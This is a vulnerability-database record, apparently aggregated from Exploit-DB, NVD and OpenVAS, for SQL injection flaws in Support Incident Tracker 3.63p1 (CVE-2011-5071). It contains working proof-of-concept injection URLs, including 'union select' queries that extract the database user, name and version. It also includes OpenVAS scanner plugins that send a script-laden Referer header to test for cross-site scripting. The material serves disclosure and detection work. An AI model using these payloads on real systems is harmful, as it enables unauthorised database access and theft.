ID EDB-ID:35986 Type exploitdb Reporter Yuri Goltsev Modified 2011-07-26T00:00:00
Description
Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/48896/info
Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected.
http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())
{"id": "EDB-ID:35986", "hash": "f2de0121094b8955420917a6063a91d4", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Support Incident Tracker SiT! 3.63 p1 - billable_incidents.php sites Parameter SQL Injection", "description": "Support Incident Tracker (SiT!) 3.63 p1 billable_incidents.php sites[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "published": "2011-07-26T00:00:00", "modified": "2011-07-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/35986/", "reporter": "Yuri Goltsev", "references": [], "cvelist": ["CVE-2011-5071"], "lastseen": "2016-02-04T02:26:28", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 6.3, "vector": "NONE", "modified": "2016-02-04T02:26:28"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2011-5071"]}, {"type": "exploitdb", "idList": ["EDB-ID:35988", "EDB-ID:35985", "EDB-ID:35987"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310802388", "OPENVAS:802388"]}], "modified": "2016-02-04T02:26:28"}, "vulnersScore": 6.3}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/35986/", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())", "osvdbidlist": ["74067"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:11:25", "bulletinFamily": "NVD", "description": "Multiple SQL injection vulnerabilities in Support Incident Tracker (aka SiT!) before 3.64 allow remote attackers to execute arbitrary SQL commands via the (1) exc[] parameter to report_marketing.php, (2) selected[] parameter to tasks.php, (3) sites[] parameter to billable_incidents.php, or (4) search_string parameter to search.php. NOTE: some of these details are obtained from third party information.", "modified": "2012-02-02T05:00:00", "id": "CVE-2011-5071", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-5071", "published": "2012-01-29T04:04:00", "title": "CVE-2011-5071", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T02:26:43", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 tasks.php selected[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35988", "href": "https://www.exploit-db.com/exploits/35988/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 3.63 p1 - tasks.php selected Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/tasks.php?selected[]=1'&action=markcomplete", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35988/"}, {"lastseen": "2016-02-04T02:26:21", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 report_marketing.php exc[] Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35985", "href": "https://www.exploit-db.com/exploits/35985/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 3.63 p1 - report_marketing.php exc Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n\r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n\r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n\r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/report_marketing.php?mode=report&exc[0]=1'", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35985/"}, {"lastseen": "2016-02-04T02:26:36", "bulletinFamily": "exploit", "description": "Support Incident Tracker (SiT!) 3.63 p1 search.php search_string Parameter SQL Injection. CVE-2011-5071. Webapps exploit for php platform", "modified": "2011-07-26T00:00:00", "published": "2011-07-26T00:00:00", "id": "EDB-ID:35987", "href": "https://www.exploit-db.com/exploits/35987/", "type": "exploitdb", "title": "Support Incident Tracker SiT! 3.63 p1 search.php search_string Parameter SQL Injection", "sourceData": "source: http://www.securityfocus.com/bid/48896/info\r\n \r\nSupport Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.\r\n \r\nA successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.\r\n \r\nSupport Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. \r\n\r\nhttp://www.example.com/sit/search.php?search_string=1' union select 1,version() ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/35987/"}], "openvas": [{"lastseen": "2017-07-02T21:10:40", "bulletinFamily": "scanner", "description": "This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross site scripting vulnerabilities.", "modified": "2017-04-14T00:00:00", "published": "2012-02-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=802388", "id": "OPENVAS:802388", "title": "Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_sit_mult_sql_inj_and_xss_vuln.nasl 5956 2017-04-14 09:02:12Z teissa $\n#\n# Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of a vulnerable site\n and to cause SQL Injection attack to gain sensitive information.\n Impact Level: Application\";\ntag_affected = \"Support Incident Tracker before 3.65\";\ntag_insight = \"The flaws are due to improper input validation errors in multiple\n scripts before being used in SQL queries and also allows attackers to\n execute arbitrary HTML.\";\ntag_solution = \"Upgrade to the Support Incident Tracker version 3.65 or later,\n For updates refer to http://sitracker.org/\";\ntag_summary = \"This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross site scripting vulnerabilities.\";\n\nif(description)\n{\n script_id(802388);\n script_version(\"$Revision: 5956 $\");\n script_cve_id(\"CVE-2011-5071\", \"CVE-2011-5072\", \"CVE-2011-5073\", \"CVE-2011-5074\",\n \"CVE-2011-5075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-14 11:02:12 +0200 (Fri, 14 Apr 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 15:15:30 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/46019\");\n script_xref(name : \"URL\" , value : \"http://sitracker.org/wiki/ReleaseNotes365\");\n script_xref(name : \"URL\" , value : \"http://www.securityfocus.com/archive/1/519636\");\n script_xref(name : \"URL\" , value : \"https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"support_incident_tracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"sit/installed\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n exit(0);\n}\n\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\ninclude(\"http_keepalive.inc\");\n\n## Get HTTP port\nsitPort = get_http_port(default:80);\nif(!sitPort){\n exit(0);\n}\n\n## Get the version from KB\ndir = get_dir_from_kb(port:sitPort,app:\"support_incident_tracker\");\nif(!dir){\n exit(0);\n}\n\n## Get Host name\nhost = get_host_name();\nif(!host){\n exit(0);\n}\n\nurl = dir + \"/forgotpwd.php?userid=1&action=sendpwd\";\nreq = string(\"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: '<script>alert(document.cookie);</script>\\r\\n\",\n \"Authorization: Basic bGFtcHA6\\r\\n\\r\\n\");\n\n## Send the attack request\nres = http_keepalive_send_recv(port:sitPort, data:req);\n\n## Confirm exploit worked by checking the response\nif(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 200 .*\", string:res) &&\n \"<script>alert(document.cookie);</script>\" >< res)\n{\n security_message(sitPort);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-12-06T16:45:12", "bulletinFamily": "scanner", "description": "This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross-site scripting vulnerabilities.", "modified": "2019-12-05T00:00:00", "published": "2012-02-01T00:00:00", "id": "OPENVAS:1361412562310802388", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802388", "title": "Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities", "type": "openvas", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802388\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_cve_id(\"CVE-2011-5071\", \"CVE-2011-5072\", \"CVE-2011-5073\", \"CVE-2011-5074\",\n \"CVE-2011-5075\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-02-01 15:15:30 +0530 (Wed, 01 Feb 2012)\");\n script_name(\"Support Incident Tracker SiT! Multiple SQL Injection And XSS Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/46019\");\n script_xref(name:\"URL\", value:\"http://sitracker.org/wiki/ReleaseNotes365\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/519636\");\n script_xref(name:\"URL\", value:\"https://www.htbridge.ch/advisory/multiple_vulnerabilities_in_sit_support_incident_tracker.html\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_dependencies(\"support_incident_tracker_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"sit/installed\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary HTML and\n script code in a user's browser session in the context of a vulnerable site\n and to cause SQL Injection attack to gain sensitive information.\");\n script_tag(name:\"affected\", value:\"Support Incident Tracker before version 3.65.\");\n script_tag(name:\"insight\", value:\"The flaws are due to improper input validation errors in multiple\n scripts before being used in SQL queries and also allows attackers to\n execute arbitrary HTML.\");\n script_tag(name:\"solution\", value:\"Upgrade to the Support Incident Tracker version 3.65 or later.\");\n script_tag(name:\"summary\", value:\"This host is running Support Incident Tracker and is prone to\n multiple sql injection and cross-site scripting vulnerabilities.\");\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\n\nCPE = 'cpe:/a:sitracker:support_incident_tracker';\n\nif(!sitPort = get_app_port(cpe:CPE))\n exit(0);\n\nif(!dir = get_app_location(cpe:CPE, port:sitPort))\n exit(0);\n\nhost = http_host_name(port:sitPort);\n\nurl = dir + \"/forgotpwd.php?userid=1&action=sendpwd\";\nreq = string(\"GET \", url, \" HTTP/1.1\\r\\n\",\n \"Host: \", host, \"\\r\\n\",\n \"Referer: '<script>alert(document.cookie);</script>\\r\\n\",\n \"Authorization: Basic bGFtcHA6\\r\\n\\r\\n\");\n\nres = http_keepalive_send_recv(port:sitPort, data:req);\n\nif(ereg(pattern:\"^HTTP/[0-9]\\.[0-9] 200 .*\", string:res) &&\n \"<script>alert(document.cookie);</script>\" >< res)\n{\n security_message(port:sitPort, data:\"The target host was found to be vulnerable.\");\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}